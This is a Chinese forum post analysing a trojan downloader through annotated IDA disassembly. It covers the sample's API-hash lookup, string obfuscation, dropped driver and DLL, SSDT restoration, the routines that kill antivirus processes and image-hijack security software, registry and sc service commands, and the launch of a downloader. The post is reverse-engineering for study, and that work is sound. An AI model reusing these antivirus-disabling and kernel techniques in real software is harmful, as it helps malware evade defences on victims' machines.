-
-
[旧帖] [原创]某个下载器分析(求邀请码) 0.00雪花
-
发表于: 2010-7-6 08:46 2192
-
【使用工具】: OD1.1 + IDA5.5
【操作平台】: XP-SP3
主要行为:
1.释放文件CCtest.inf,CCtest.sys,CCtest.dll,ring0恢复SSDT,做掉安全软件进程,ring0映像劫持安全软件进程
2.并做安全软件进程释放XXXXscdXXXX.exe下载大小的木马
3.释放文件tmpacik.tmp干掉还原
母体文件释放了五个个文件3120.reg、
CCtest.inf、CCtest.sys、CCtest.dll、 [用于做掉安全软件]
XXXXscdXXXX.exe(XXX为随机名)、 [下载大量木马]
tmpacik.tmp(dll文件) [用于干掉还原软件]
tmpacik.tmp(dll文件)又释放了文件pcidump.sys
建立互斥体防止多个实例同时运行.Upack:0041EB94 add esp, 30h
.Upack:0041EB97 ; .Upack:0041EB97
.Upack:0041EBA0 建立互斥体防止多个实例同时运行
.Upack:0041EBA0
.Upack:0041EBA0 loc_41EBA0: ; CODE XREF: start+BFj
.Upack:0041EBA0 push offset Name ; "LDMMOO."
.Upack:0041EBA5 push ebx ; bInitialOwner
.Upack:0041EBA6 push ebx ; lpMutexAttributes
.Upack:0041EBA7 call CreateMutexA
.Upack:0041EBAD call GetLastError
.Upack:0041EBB3 cmp eax, 0B7h
.Upack:0041EBB8 jnz short loc_41EBC1
.Upack:0041EBBA push ebx ; uExitCode
.Upack:0041EBBB call ExitProcess
复制代码比对函数的Hash值,获取函数地址.Upack:0041EC08 call GetSystemDirectoryA
.Upack:0041EC0E push 774393E8h
.Upack:0041EC13 push 1
.Upack:0041EC15 call __GetProcessAddressByHashValue ; GetModuleFileNameA,
.Upack:0041EC15 ; 比对函数的Hash值,获取函数地址
.Upack:0041EC15 ;
.Upack:0041EC1A lea ecx, [ebp+lpszModuleFileName]
.Upack:0041EC20 push esi
.Upack:0041EC21 push ecx
.Upack:0041EC22 push ebx
.Upack:0041EC23 call eax ; GetModuleFileNameA
复制代码进入__GetProcessAddressByHashValue 看看吧
通过计算函数名的Hash值获取函数地址.Upack:0041F0AF loc_41F0AF: ; CODE XREF: __GetProcessAddressByHashValue+96j
.Upack:0041F0AF mov ecx, [ebp+nFlag]
.Upack:0041F0B2 test ecx, ecx
.Upack:0041F0B4 jz short JMPAndRet ; Kernel32获取失败跳走
.Upack:0041F0B6 mov eax, [ecx+IMAGE_DOS_HEADER.e_lfanew] ; PE头
.Upack:0041F0B9 mov esi, [eax+ecx+IMAGE_NT_HEADERS.OptionalHeader.DataDirectory.VirtualAddress] ; 输出表地址RAV
.Upack:0041F0BD lea edx, [eax+ecx+IMAGE_NT_HEADERS.OptionalHeader] ; 取可选头地址
.Upack:0041F0C1 mov eax, [ebp+HashValue]
.Upack:0041F0C4 add esi, ecx ; 输出表地址VA
.Upack:0041F0C6 shr eax, 10h
.Upack:0041F0C9 test ax, ax
.Upack:0041F0CC mov [ebp+lpOptionHeaders], edx
.Upack:0041F0CF jnz short loc_41F0DA
.Upack:0041F0D1 movzx eax, word ptr [ebp+HashValue]
.Upack:0041F0D5 sub eax, [esi+IMAGE_EXPORT_DIRECTORY.Base]
.Upack:0041F0D8 jmp short loc_41F134
.Upack:0041F0DA ; ---------------------------------------------------------------------------
.Upack:0041F0DA
.Upack:0041F0DA loc_41F0DA: ; CODE XREF: __GetProcessAddressByHashValue+10Aj
.Upack:0041F0DA mov ebx, [esi+IMAGE_EXPORT_DIRECTORY.AddressOfNames]
.Upack:0041F0DD mov eax, [esi+IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals]
.Upack:0041F0E0 and [ebp+dwIndex], 0 ; 初始化计数器
.Upack:0041F0E4 add ebx, ecx ; ENT,导出名字表地址
.Upack:0041F0E6 add eax, ecx ; EOT,导出序号表地址
.Upack:0041F0E8 cmp [esi+IMAGE_EXPORT_DIRECTORY.NumberOfNames], 0 ; 判断按名字导出的是否为0
.Upack:0041F0EC mov [ebp+lpExportTableAddress], eax
.Upack:0041F0EF jbe short loc_41F114 ; 小于等于0跳走
.Upack:0041F0F1 搜索Kernel32的ENT,逐一比较函数名的Hash值
.Upack:0041F0F1
.Upack:0041F0F1 loc_41F0F1: ; CODE XREF: __GetProcessAddressByHashValue+14Dj
.Upack:0041F0F1 mov eax, [ebx] ; 取出一个导出函数名RAV
.Upack:0041F0F3 add eax, [ebp+nFlag] ; 导出函数名VA
.Upack:0041F0F6 push eax ; lpszExportFuncName
.Upack:0041F0F7 call ComputedHashValue ; 计算出函数名的Hash值
.Upack:0041F0FC cmp eax, [ebp+HashValue] ; 对比Hash是否相同
.Upack:0041F0FF pop ecx ; 清栈
.Upack:0041F100 jz short loc_41F126 ; Hash相同证明函数名已经找到
.Upack:0041F102 inc [ebp+dwIndex] ; 计数器加1
.Upack:0041F105 add [ebp+lpExportTableAddress], 2 ; 序号表地址向后移动
.Upack:0041F109 mov eax, [ebp+dwIndex]
.Upack:0041F10C add ebx, 4 ; 移动到下一个导出函数名
.Upack:0041F10F cmp eax, [esi+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
.Upack:0041F112 jb short loc_41F0F1 ; 跳走继续查找下一个函数名
.Upack:0041F114
.Upack:0041F114 loc_41F114: ; CODE XREF: __GetProcessAddressByHashValue+12Aj
.Upack:0041F114 mov eax, [ebp+HashValue]
.Upack:0041F117
.Upack:0041F117 loc_41F117: ; CODE XREF: __GetProcessAddressByHashValue+167j
.Upack:0041F117 mov ecx, [ebp+dwIndex]
.Upack:0041F11A cmp ecx, [esi+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
.Upack:0041F11D jnz short loc_41F12E ; 取出Kernel32基址
.Upack:0041F11F
.Upack:0041F11F JMPAndRet: ; CODE XREF: __GetProcessAddressByHashValue+EFj
.Upack:0041F11F xor eax, eax
.Upack:0041F121 jmp Ret
.Upack:0041F126 ; ---------------------------------------------------------------------------
.Upack:0041F126
.Upack:0041F126 loc_41F126: ; CODE XREF: __GetProcessAddressByHashValue+13Bj
.Upack:0041F126 mov eax, [ebp+lpExportTableAddress]
.Upack:0041F129 movzx eax, word ptr [eax] ; 取出序号
.Upack:0041F12C jmp short loc_41F117
.Upack:0041F12E ; ---------------------------------------------------------------------------
.Upack:0041F12E
.Upack:0041F12E loc_41F12E: ; CODE XREF: __GetProcessAddressByHashValue+158j
.Upack:0041F12E mov ecx, [ebp+nFlag] ; 取出Kernel32基址
.Upack:0041F131 mov edx, [ebp+lpOptionHeaders]
.Upack:0041F134
.Upack:0041F134 loc_41F134: ; CODE XREF: __GetProcessAddressByHashValue+113j
.Upack:0041F134 mov ebx, [esi+IMAGE_EXPORT_DIRECTORY.AddressOfFunctions]
.Upack:0041F137 lea eax, [ebx+eax*4]
.Upack:0041F13A mov ebx, [eax+ecx] ; 导出函数地址RAV
.Upack:0041F13D add ebx, ecx ; 计算出函数的RVA
.Upack:0041F13F mov eax, ebx ; 得到函数的VA
.Upack:0041F141 sub eax, esi
.Upack:0041F143 cmp eax, [edx+IMAGE_OPTIONAL_HEADER32.DataDirectory.Size]
.Upack:0041F146 jnb loc_41F1D8 ; 跳走并返回函数地址
复制代码释放文件并Kill大量的安全软件.Upack:0041ED2D loc_41ED2D: ; CODE XREF: start+24Cj
.Upack:0041ED2D push 6FB89AF0h
.Upack:0041ED32 push 1
.Upack:0041ED34 call __GetProcessAddressByHashValue ; 获取CreateThread地址
.Upack:0041ED39 push ebx
.Upack:0041ED3A push ebx
.Upack:0041ED3B push ebx
.Upack:0041ED3C push offset lpfnThreadProc
.Upack:0041ED41 push ebx
.Upack:0041ED42 push ebx
.Upack:0041ED43 call eax ; CreateThread
.Upack:0041ED45 push 4000
.Upack:0041ED4A call __Sleep
.Upack:0041ED4F ; .Upack:0041ED4F
.Upack:0041ED58
.Upack:0041ED58 loc_41ED58: ; CODE XREF: start+277j
.Upack:0041ED58 call KillSafeSoft ; 释放文件并Kill大量的安全软件
.Upack:0041ED5D mov dword ptr [esp], 7D0h
.Upack:0041ED64 call __Sleep
复制代码进入KillSafeSoft
构建临时目录准备释放注册表文件
构建CMD字符串,用CMD命令把注册表文件导入到注册表
[code.Upack:0041E7AB 构建临时目录准备释放文件
.Upack:0041E7AB add esp, 18h
.Upack:0041E7AE lea eax, [ebp+lpszRegFileName]
.Upack:0041E7B4 push eax ; lpBuffer
.Upack:0041E7B5 push edi ; nBufferLength
.Upack:0041E7B6 call GetTempPathA
.Upack:0041E7BC mov esi, lstrcat
.Upack:0041E7C2 lea eax, [ebp+lpszRegFileName]
.Upack:0041E7C8 push offset a3120_reg ; "3120.reg"
.Upack:0041E7CD push eax
.Upack:0041E7CE call esi ; lstrcat
.Upack:0041E7D0 lea eax, [ebp+lpszRegFileName]
.Upack:0041E7D6 push eax ; lpFileName
.Upack:0041E7D7 call ReleaseRegFile ; 临时目录释放注册表文件"3120.reg"
.Upack:0041E7DC 为导入注册表构建CMD命令
.Upack:0041E7DC lea eax, [ebp+lpCMDImportReg]
.Upack:0041E7E2 mov dword ptr [esp], offset aImport ; "import "
.Upack:0041E7E9 push eax
.Upack:0041E7EA call lstrcpy
.Upack:0041E7F0 lea eax, [ebp+lpszRegFileName]
.Upack:0041E7F6 push eax
.Upack:0041E7F7 lea eax, [ebp+lpCMDImportReg]
.Upack:0041E7FD push eax
.Upack:0041E7FE call esi ; lstrcat
.Upack:0041E800 push ebx
.Upack:0041E801 lea eax, [ebp+lpCMDImportReg]
.Upack:0041E807 push ebx
.Upack:0041E808 push eax
.Upack:0041E809 push offset aReg_exe ; "reg.exe"
.Upack:0041E80E push offset aOpen ; "open"
.Upack:0041E813 push ebx
.Upack:0041E814 call __ShellExecuteA ; 释放的文件导入到注册表
[/code]
更改IP 安全策略服务Upack:0041E823 push ebx
.Upack:0041E824 lea eax, [ebp+szCMDAuto]
.Upack:0041E827 push ebx
.Upack:0041E828 push eax ; "config PolicyAgent start= auto"
.Upack:0041E829 push offset aSc ; "sc"
.Upack:0041E82E push offset aOpen ; "open"
.Upack:0041E833 push ebx
.Upack:0041E834 call __ShellExecuteA ; 配置"IP 安全策略"服务为自动
.Upack:0041E839 push 7D0h
.Upack:0041E83E call __Sleep
.Upack:0041E843 push ebx
.Upack:0041E844 lea eax, [ebp+szCMDStop]
.Upack:0041E847 push ebx
.Upack:0041E848 push eax ; "stop PolicyAgent"
.Upack:0041E849 push offset aSc ; "sc"
.Upack:0041E84E push offset aOpen ; "open"
.Upack:0041E853 push ebx
.Upack:0041E854 call __ShellExecuteA ; 停止"IP 安全策略"服务
.Upack:0041E859 add esp, 50h
.Upack:0041E85C push 7D0h
.Upack:0041E861 call __Sleep
.Upack:0041E866 push ebx
.Upack:0041E867 lea eax, [ebp+szCMDStart]
.Upack:0041E86A push ebx
.Upack:0041E86B push eax ; "start PolicyAgent"
.Upack:0041E86C push offset aSc ; "sc"
.Upack:0041E871 push offset aOpen ; "open"
.Upack:0041E876 push ebx
.Upack:0041E877 call __ShellExecuteA ; 开始"IP 安全策略"服务
.Upack:0041E87C push 7D0h
.Upack:0041E881 call __Sleep
复制代码删除释放的注册表文件.Upack:0041E886 lea eax, [ebp+lpszRegFileName]
.Upack:0041E88C push eax
.Upack:0041E88D call __DeleteFileA ; 删除释放的注册表文件
复制代码释放文件CCtest.inf,CCtest.sys准备加载驱动.Upack:0041E93F 构建文件路径,准备释放文件
.Upack:0041E93F "c:\progra~1\\RAV\CCtest.inf"
.Upack:0041E93F "c:\progra~1\\RAV\CCtest.dll"
.Upack:0041E93F "c:\progra~1\\RAV\CCtest.sys"
.Upack:0041E93F
.Upack:0041E93F loc_41E93F: ; CODE XREF: KillSafeSoft+650j
.Upack:0041E93F lea eax, [ebp+Buffer]
.Upack:0041E945 push eax
.Upack:0041E946 lea eax, [ebp+InfName]
.Upack:0041E94C push eax
.Upack:0041E94D call edi ; lstrcpy
.Upack:0041E94F lea eax, [ebp+szCCtest_inf]
.Upack:0041E952 push eax
.Upack:0041E953 lea eax, [ebp+InfName]
.Upack:0041E959 push eax
.Upack:0041E95A call esi ; lstrcat
.Upack:0041E95C lea eax, [ebp+Buffer]
.Upack:0041E962 push eax
.Upack:0041E963 lea eax, [ebp+SysName]
.Upack:0041E969 push eax
.Upack:0041E96A call edi ; lstrcpy
.Upack:0041E96C lea eax, [ebp+CCtest_sys]
.Upack:0041E96F push eax
.Upack:0041E970 lea eax, [ebp+SysName]
.Upack:0041E976 push eax
.Upack:0041E977 call esi ; lstrcat
.Upack:0041E979 lea eax, [ebp+Buffer]
.Upack:0041E97F push eax
.Upack:0041E980 lea eax, [ebp+DllName]
.Upack:0041E986 push eax
.Upack:0041E987 call edi ; lstrcpy
.Upack:0041E989 lea eax, [ebp+szCCtest_dll]
.Upack:0041E98C push eax
.Upack:0041E98D lea eax, [ebp+DllName]
.Upack:0041E993 push eax
.Upack:0041E994 call esi ; lstrcat
.Upack:0041E996 ; .Upack:0041E996
.Upack:0041E99F
.Upack:0041E99F loc_41E99F: ; CODE XREF: KillSafeSoft+6B0j
.Upack:0041E99F lea eax, [ebp+InfName]
.Upack:0041E9A5 push eax ; lpszInfFileName
.Upack:0041E9A6 call ReleaseInfFile ; 释放文件"c:\progra~1\\RAV\CCtest.inf"
.Upack:0041E9AB test al, al
.Upack:0041E9AD pop ecx
.Upack:0041E9AE jz FailRet ; 释放文件失败跳走
.Upack:0041E9B4 lea eax, [ebp+SysName]
.Upack:0041E9BA push eax ; lpFileName
.Upack:0041E9BB call ReleaseSysFile ; 释放文件"c:\progra~1\\RAV\CCtest.Sys"
.Upack:0041E9C0 test al, al
.Upack:0041E9C2 pop ecx
.Upack:0041E9C3 jz FailRet ; 释放文件失败跳走
复制代码加载驱动.Upack:0041E9CF push offset PropertyBuffer ; "*CCTestDevice"
.Upack:0041E9D4 push eax ; InfName
.Upack:0041E9D5 call LoadDriver ; 加载驱动
.Upack:0041E9DA push 3E8h
.Upack:0041E9DF call __Sleep
.Upack:0041E9E4 push ebx ; MemberIndex
.Upack:0041E9E5 push offset InterfaceClassGuid ; InterfaceClassGuid
.Upack:0041E9EA call EunuInterface ; 获取驱动句柄
.Upack:0041E9EF mov esi, eax
.Upack:0041E9F1 add esp, 14h
.Upack:0041E9F4 cmp esi, ebx
.Upack:0041E9F6 jnz short loc_41EA1A ; 成功跳走
复制代码加载CCtest.dll,并调用testall函数ring0恢复SSDT,做掉安全软件进程,ring0映像劫持安全软件进程Upack:0041EA5A lea eax, [ebp+DllName]
.Upack:0041EA60 push eax
.Upack:0041EA61 call __DeleteFileA
.Upack:0041EA66 pop ecx
.Upack:0041EA67 ; loc_41EA67
.Upack:0041EA70
.Upack:0041EA70 loc_41EA70: ; CODE XREF: KillSafeSoft+781j
.Upack:0041EA70 push 723EB0D5h
.Upack:0041EA75 push 1
.Upack:0041EA77 call __GetProcessAddressByHashValue ; 获取CloseHandle函数地址
.Upack:0041EA7C push esi
.Upack:0041EA7D call eax ; CloseHandle
.Upack:0041EA7F lea eax, [ebp+InfName]
.Upack:0041EA85 push eax ; InfName
.Upack:0041EA86 call UnloadDriver ; 卸载驱动
.Upack:0041EA8B lea eax, [ebp+InfName]
.Upack:0041EA91 push eax
.Upack:0041EA92 call __DeleteFileA ; 删除文件"c:\progra~1\\RAV\CCtest.inf"
.Upack:0041EA97 lea eax, [ebp+SysName]
.Upack:0041EA9D push eax
.Upack:0041EA9E call __DeleteFileA ; 删除文件"c:\progra~1\\RAV\CCtest.sys"
.Upack:0041EAA3 lea eax, [ebp+lpSubKey]
.Upack:0041EAA9 push eax
.Upack:0041EAAA push 80000002h
.Upack:0041EAAF call __RegDeleteKeyA
.Upack:0041EAB4 push ebx
.Upack:0041EAB5 lea eax, [ebp+szCMDStop]
.Upack:0041EAB8 push ebx
.Upack:0041EAB9 push eax
.Upack:0041EABA push offset aSc ; "sc"
.Upack:0041EABF push offset aOpen ; "open"
.Upack:0041EAC4 push ebx
.Upack:0041EAC5 call __ShellExecuteA ; 停止"IP 安全策略"服务
.Upack:0041EACA push 5DCh
.Upack:0041EACF call __Sleep
.Upack:0041EAD4 add esp, 2Ch
.Upack:0041EAD7
.Upack:0041EAD7 FailRet: ; CODE XREF: KillSafeSoft+6C2j
.Upack:0041EAD7 ; KillSafeSoft+6D7j
.Upack:0041EAD7 xor eax, eax
.Upack:0041EAD9
.Upack:0041EAD9 Ret: ; CODE XREF: KillSafeSoft+729j
.Upack:0041EAD9 pop edi
.Upack:0041EADA pop esi
.Upack:0041EADB pop ebx
.Upack:0041EADC leave
.Upack:0041EADD retn
.Upack:0041EADD KillSafeSoft endp
复制代码之后就是清理现场了,删除释放的文件.Upack:0041EA1A loc_41EA1A: ; CODE XREF: KillSafeSoft+70Aj
.Upack:0041EA1A lea eax, [ebp+DllName]
.Upack:0041EA20 push eax ; lpFileName
.Upack:0041EA21 call ReleaseDllFile ; 释放文件"c:\progra~1\\RAV\CCtest.dll"
.Upack:0041EA26 test al, al
.Upack:0041EA28 pop ecx
.Upack:0041EA29 jz short loc_41EA67 ; 释放文件失败跳走
.Upack:0041EA2B lea eax, [ebp+DllName]
.Upack:0041EA31 push eax ; lpLibFileName
.Upack:0041EA32 call LoadLibraryA ; 加载释放的文件"c:\progra~1\\RAV\CCtest.dll
.Upack:0041EA38 mov edi, eax
.Upack:0041EA3A lea eax, [ebp+testall]
.Upack:0041EA3D push eax ; lpProcName
.Upack:0041EA3E push edi ; hModule
.Upack:0041EA3F call GetProcAddress ; 获"c:\progra~1\\RAV\CCtest.dll"
.Upack:0041EA3F ; 的testall函数地址
.Upack:0041EA45 push esi ; hDevice
.Upack:0041EA46 call eax ; 调用testall,ring0恢复SSDT,做掉安全软件进程,ring0映像劫持安全软件进程
.Upack:0041EA48 push 0BB8h
.Upack:0041EA4D call __Sleep
.Upack:0041EA52 pop ecx
.Upack:0041EA53 push edi ; hLibModule
.Upack:0041EA54 call FreeLibrary
.Upack:0041EA5A lea eax, [ebp+DllName]
.Upack:0041EA60 push eax
.Upack:0041EA61 call __DeleteFileA
复制代码回到主函数
做掉安全软件之后,就释放一个随机文件名的文件,开始下载大量木马.Upack:0041ED92 lea eax, [ebp+szRandTempFileName]
.Upack:0041ED98 push eax ; lpBuffer
.Upack:0041ED99 push esi ; nBufferLength
.Upack:0041ED9A call GetTempPathA
.Upack:0041EDA0 ; .Upack:0041EDA0
.Upack:0041EDA9 nop
.Upack:0041EDAA
.Upack:0041EDAA loc_41EDAA: ; CODE XREF: start+2C9j
.Upack:0041EDAA call __GetTickCount ; 获取系统滴答数,以产生随机数
.Upack:0041EDAF 构建随机临时文件
.Upack:0041EDAF push eax
.Upack:0041EDB0 lea eax, [ebp+szRandTempFileName]
.Upack:0041EDB6 push eax
.Upack:0041EDB7 lea eax, [ebp+szRandTempFileName]
.Upack:0041EDBD push offset aScdD_exe ; "%scd%d.exe"
.Upack:0041EDC2 push eax ; LPSTR
.Upack:0041EDC3 call wsprintfA
.Upack:0041EDC9 lea eax, [ebp+szRandTempFileName]
.Upack:0041EDCF push eax ; lpszRandTempFileName
.Upack:0041EDD0 call ReleaseRandomTempFile ; 临时目录释放随机生成文件名的文件
.Upack:0041EDD5 nop
.Upack:0041EDD6 push ebx
.Upack:0041EDD7 push ebx
.Upack:0041EDD8 lea eax, [ebp+szRandTempFileName]
.Upack:0041EDDE push offset lpParameters
.Upack:0041EDE3 push eax
.Upack:0041EDE4 push 41CB18h
.Upack:0041EDE9 push ebx
.Upack:0041EDEA call __ShellExecuteA ; 运行随机生成文件名的文件,开始下载木马了
复制代码释文文件tmpacik.tmp并加载,调用killhy来做掉还原.Upack:0041EE78 loc_41EE78: ; CODE XREF: start+397j
.Upack:0041EE78 lea eax, [ebp+tmpFileName] ; "C:\windows\system32\tmpacik.tmp"
.Upack:0041EE7E push eax ; lpFileName
.Upack:0041EE7F call ReleaseFile ; 系统目录下释放文件"tmpacik.tmp"
.Upack:0041EE84 test al, al
.Upack:0041EE86 pop ecx
.Upack:0041EE87 jz short loc_41EEE4 ; 释放文件失败跳走
.Upack:0041EE89 lea eax, [ebp+tmpFileName] ; "C:\windows\system32\tmpacik.tmp"
.Upack:0041EE8F push eax ; lpLibFileName
.Upack:0041EE90 call LoadLibraryA ; 加载释放的文件"C:\windows\system32\tmpacik.tmp"
.Upack:0041EE96 ; .Upack:0041EE96
.Upack:0041EE9F lea ecx, [ebp+killhy]
.Upack:0041EEA2 push ecx ; lpProcName
.Upack:0041EEA3
.Upack:0041EEA3 loc_41EEA3: ; CODE XREF: start+3BEj
.Upack:0041EEA3 push eax ; hModule
.Upack:0041EEA4 call GetProcAddress ; 获取killhy函数地址
.Upack:0041EEAA ; .Upack:0041EEAA
.Upack:0041EEB3
.Upack:0041EEB3 loc_41EEB3: ; CODE XREF: start+3D2
复制代码母体文件分析完毕
***********************************释放的文件CCtest.dll分析************************************
模块初始化时提升进程权限
.text:100027E0 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
.text:100027E0 public DllEntryPoint
.text:100027E0 DllEntryPoint proc near
.text:100027E0
.text:100027E0 hinstDLL = dword ptr 4
.text:100027E0 fdwReason = dword ptr 8
.text:100027E0 lpReserved = dword ptr 0Ch
.text:100027E0
.text:100027E0 call __AdjustTokenPrivilege
.text:100027E5 push 774393E8h
.text:100027EA push 1
.text:100027EC call GetProcAddressByHashValue ; 获取GetModuleFileName函数地址
.text:100027F1 push 0FFh
.text:100027F6 push offset lpszDllModuleFileName
.text:100027FB mov ecx, [esp+8+hinstDLL]
.text:100027FF push ecx
.text:10002800 call eax ; GetModuleFileName
.text:10002802 mov eax, 1
.text:10002807 retn 0Ch
.text:10002807 DllEntryPoint endp
复制代码CCtest.dll的testall接口分析
.text:10002670 sub_10002670 proc near ; CODE XREF: testall+Ep
.text:10002670
.text:10002670 szShellExecute = byte ptr -1Ch
.text:10002670 szShell32_dll = byte ptr -0Ch
.text:10002670 hDriver = dword ptr 8
.text:10002670
.text:10002670 push ebp
.text:10002671 mov ebp, esp
.text:10002673 sub esp, 1Ch
.text:10002676 mov al, 'l'
.text:10002678 push esi
.text:10002679 mov [ebp+szShellExecute+3], al
.text:1000267C mov [ebp+szShellExecute+4], al
.text:1000267F mov [ebp+szShell32_dll+3], al
.text:10002682 mov [ebp+szShell32_dll+4], al
.text:10002685 mov [ebp+szShell32_dll+9], al
.text:10002688 mov [ebp+szShell32_dll+0Ah], al
.text:1000268B lea eax, [ebp+szShell32_dll]
.text:1000268E mov cl, 'e'
.text:10002690 xor dl, dl
.text:10002692 push eax ; lpLibFileName
.text:10002693 mov [ebp+szShellExecute], 'S'
.text:10002697 mov [ebp+szShellExecute+1], 'h'
.text:1000269B mov [ebp+szShellExecute+2], cl
.text:1000269E mov [ebp+szShellExecute+5], 'E'
.text:100026A2 mov [ebp+szShellExecute+6], 'x'
.text:100026A6 mov [ebp+szShellExecute+7], cl
.text:100026A9 mov [ebp+szShellExecute+8], 'c'
.text:100026AD mov [ebp+szShellExecute+9], 'u'
.text:100026B1 mov [ebp+szShellExecute+0Ah], 't'
.text:100026B5 mov [ebp+szShellExecute+0Bh], cl
.text:100026B8 mov [ebp+szShellExecute+0Ch], 'A'
.text:100026BC mov [ebp+szShellExecute+0Dh], dl
.text:100026BF mov [ebp+szShell32_dll], 's'
.text:100026C3 mov [ebp+szShell32_dll+1], 'h'
.text:100026C7 mov [ebp+szShell32_dll+2], cl
.text:100026CA mov [ebp+szShell32_dll+5], '3'
.text:100026CE mov [ebp+szShell32_dll+6], '2'
.text:100026D2 mov [ebp+szShell32_dll+7], '.'
.text:100026D6 mov [ebp+szShell32_dll+8], 'd'
.text:100026DA mov [ebp+szShell32_dll+0Bh], dl
.text:100026DD call LoadLibraryA
.text:100026E3 nop
.text:100026E4 lea ecx, [ebp+szShellExecute]
.text:100026E7 push ecx ; lpProcName
.text:100026E8 push eax ; hModule
.text:100026E9 call GetProcAddress
.text:100026EF mov lpfnShellExecute, eax
.text:100026F4 ; .text:100026F4
.text:100026FC mov esi, [ebp+hDriver]
.text:100026FF push esi
.text:10002700
.text:10002700 loc_10002700: ; CODE XREF: sub_10002670+89j
.text:10002700 call ReSSDT ; ring0恢复SSDT
.text:10002705 add esp, 4
.text:10002708 push eax
.text:10002709 nop
.text:1000270A nop
.text:1000270B pop eax
.text:1000270C push 3D9972F5h
.text:10002711 push 1
.text:10002713 call GetProcAddressByHashValue ; 获取Sleep函数地址
.text:10002718 push 1000
.text:1000271D call eax ; Sleep
.text:1000271F push eax
.text:10002720 nop
.text:10002721 nop
.text:10002722 pop eax
.text:10002723 push offset String2 ; "hnuq1h{h"
.text:10002728 call DecryString ; 解密后字符串是"ekrn.exe"
.text:1000272D push eax ; lpString1
.text:1000272E call GetProcessId ; 遍历进程获取ID
.text:10002733 add esp, 8
.text:10002736 test eax, eax
.text:10002738 jnz short loc_10002756 ; 找到"ekrn.exe"进程跳走
.text:1000273A push esi ; hDriver
.text:1000273B call Kill360Safe ; 结束360安全卫士及主动防御进程
.text:10002740 add esp, 4
.text:10002743 push 3D9972F5h
.text:10002748 push 1
.text:1000274A call GetProcAddressByHashValue ; 获取Sleep函数地址
.text:1000274F push 1000
.text:10002754 call eax ; Sleep
.text:10002756 ; loc_10002756
.text:10002762
.text:10002762 loc_10002762: ; CODE XREF: sub_10002670+EBj
.text:10002762 call KillAvp ; 做掉卡巴,先卸载卡巴的模块,
.text:10002762 ; 一个结束进程的批处理做掉卡巴
.text:10002767 ; .text:10002767
.text:1000276B push 3D9972F5h
.text:10002770 push 1
.text:10002772 call GetProcAddressByHashValue ; 获取Sleep函数地址
.text:10002777 push 1000
.text:1000277C call eax ; Sleep
.text:1000277E ; .text:1000277E
.text:10002782 push esi ; hDriver
.text:10002783 call KillSafeSoft ; 遍历进程结束掉大量的安全软件进程
.text:10002788 ; .text:10002788
.text:10002790 push esi ; hDriver
.text:10002791
.text:10002791 loc_10002791: ; CODE XREF: sub_10002670+11Dj
.text:10002791 call ImageExecuteFile ; ring0镜像劫持安全软件的进程
.text:10002796 add esp, 4
.text:10002799 push 3D9972F5h
.text:1000279E push 1
.text:100027A0 call GetProcAddressByHashValue
.text:100027A5 push 3E8h
.text:100027AA call eax
.text:100027AC pop esi
.text:100027AD mov esp, ebp
.text:100027AF pop ebp
.text:100027B0 retn
.text:100027B0 sub_10002670 endp ; sp-analysis failed
.text:100027B0
.text:100027B0 ; ---------------------------------------------------------------------------
.text:100027B1 align 10h
.text:100027C0 ; Exported entry 1. testall
复制代码
进入call ReSSDT看看,其call主要功能是恢复SSDT
调用NtQuerySystemInformation的B号功能获取当前获取内核的模块基址与内核模块名.text:1000186F 获取系统模块
.text:1000186F mov esi, eax
.text:10001871 nop
.text:10001872 mov ecx, [ebp+pModules]
.text:10001875 lea eax, [ebp+dwNeededSize]
.text:10001878 push eax ; ReturnLength
.text:10001879 push 4 ; SystemInformationLength
.text:1000187B push ecx ; SystemInformation
.text:1000187C push 0Bh ; SystemModuleInformation
.text:1000187E call esi ; NtQuerySystemInformation
.text:10001880 nop
.text:10001881 cmp eax, 0C0000004h
.text:10001886 jnz Ret ; 失败跳走
.text:1000188C mov edx, [ebp+dwNeededSize]
.text:1000188F push edx ; dwBytes
.text:10001890 push 40h ; uFlags
.text:10001892 call GlobalAlloc
.text:10001898 mov ecx, [ebp+dwNeededSize]
.text:1000189B push edi
.text:1000189C push ecx
.text:1000189D push eax
.text:1000189E push 0Bh
.text:100018A0 mov [ebp+pModules], eax
.text:100018A3 call esi ; NtQuerySystemInformation
.text:100018A5 test eax, eax
.text:100018A7 jl Ret ; 失败跳走
.text:100018AD mov eax, [ebp+pModules]
.text:100018B0 xor ecx, ecx
.text:100018B2 mov cx, [eax+MODULES.smi.ModuleNameOffset]
.text:100018B6 mov edx, [eax+MODULES.smi.Base]
.text:100018B9 mov [ebp+hKernelBase], edx
.text:100018BC lea eax, [ecx+eax+MODULES.smi.ImageName] ; 得到内核模块名
复制代码
在用户进程中加载一个内核副本,搜索内核的副本并得到KeServiceDescriptorTable RAV地址
.text:100018C1 push 1 ; dwFlags
.text:100018C3 push edi ; hFile
.text:100018C4 push eax ; lpLibFileName
.text:100018C5 call LoadLibraryExA ; 加载内核副本
.text:100018CB mov esi, eax
.text:100018CD test esi, esi
.text:100018CF mov [ebp+hKernel], esi
.text:100018D2 jz Ret
.text:100018D8 nop
.text:100018D9 mov edx, [ebp+pModules]
.text:100018DC push edx ; hMem
.text:100018DD call GlobalFree
.text:100018E3 push offset ProcName ; "KeServiceDescriptorTable"
.text:100018E8 push esi ; hModule
.text:100018E9 call ebx ; GetProcAddress
.text:100018EB test eax, eax
.text:100018ED jz short Ret ; 失败跳走
.text:100018EF sub eax, esi ; 得到KeServiceDescriptorTable RAV地址
.text:100018F1 push eax
.text:100018F2 push esi
.text:100018F3 call FindKiServiceTable
复制代码
通过内核副本的原始数据发送控制码恢复SSDT.text:1000192B mov ebx, [eax]
.text:1000192D mov edx, [ebp+hKernelBase]
.text:10001930 sub ecx, ebx
.text:10001932 lea eax, [ebp+ulAddr]
.text:10001935 add ecx, edx
.text:10001937 push eax ; pulAddr
.text:10001938 mov [ebp+ulAddr], ecx
.text:1000193B mov ecx, [ebp+hDriver]
.text:1000193E push edi ; dwServices
.text:1000193F push ecx ; hDriver
.text:10001940 call SetProc ; 除了Hash值获取函数地址其他的
.text:10001940 ; 都是COPY来的一字未改的代码
.text:10001945 mov edx, [ebp+poh]
.text:10001948 mov ecx, [esi+4]
.text:1000194B add esi, 4
.text:1000194E mov ebx, ecx
.text:10001950 sub ebx, [edx+IMAGE_OPTIONAL_HEADER32.ImageBase]
.text:10001953 lea eax, [edx+IMAGE_OPTIONAL_HEADER32.ImageBase]
